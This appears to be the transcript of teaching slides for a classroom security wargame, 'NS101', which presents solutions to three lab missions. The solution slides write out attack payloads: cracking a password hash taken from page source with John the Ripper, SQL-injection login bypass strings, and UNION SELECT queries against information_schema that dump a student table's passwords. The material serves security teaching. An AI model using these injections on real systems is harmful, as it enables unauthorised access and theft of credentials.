1 / 11

### Engage in NS101 Wargame: A Comprehensive Security Challenge ###

Join the NS101 Wargame, an immersive security challenge where participants must uncover and exploit vulnerabilities within computer systems and applications. In this engaging experience, participants will complete three missions utilizing various hacking techniques and tools learned in prior NS lessons. From decoding encrypted passwords to executing SQL injection techniques, each mission will enhance your cybersecurity skills. Bear in mind, Denial of Service (DoS) attacks are strictly prohibited. Step up, tackle the challenges, and become a proficient cybersecurity practitioner! ###

enan
Télécharger la présentation

### Engage in NS101 Wargame: A Comprehensive Security Challenge ###

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. NS101 Wargame A Security Challenge

  2. Introduction • What is a wargame ? • Asecurity challenge in which one must exploit a vulnerability in a system or application or gain access to a computer system. • Usually involves several hacking techniques.

  3. Goal & Rules • Complete 3 Missions • Use the tools/methods you learned from NS lessons • Find solutions on the Internet • DoS attacks are not allowed

  4. It’s your term !

  5. Solutions • Mission 1 • (1) View the source code of the page (2) Copy the encrypted password

  6. Solutions • Mission 1 (3) Paste to a txt file (4) Use john the ripper to crack the password

  7. Solutions • Mission 2 • Try or ‘ or 1=1 --’ ‘ or ‘a’=‘a

  8. Solutions • Mission 3 • (1) Search the user name in the hint, this page show information in two column.

  9. Solutions • Mission 3 • (2) try Select two column ‘ union SELECT table_name,table_typeFROM information_schema.tables where ‘a’ = ‘a Union the 2nd select statement ※ If you try and error , you will find out the database is MySQL ※ about information_schema Find out the table name

  10. Solutions • Mission 3 • (3) try ‘ union SELECT column_name,column_type FROM information_schema.columns where table_name = ‘student Find all columns in student table Find out the hidden column

  11. Solutions • Mission 3 • (4) try Show all passwords ‘ union SELECT id,pw FROM student where ‘a’= ‘a

More Related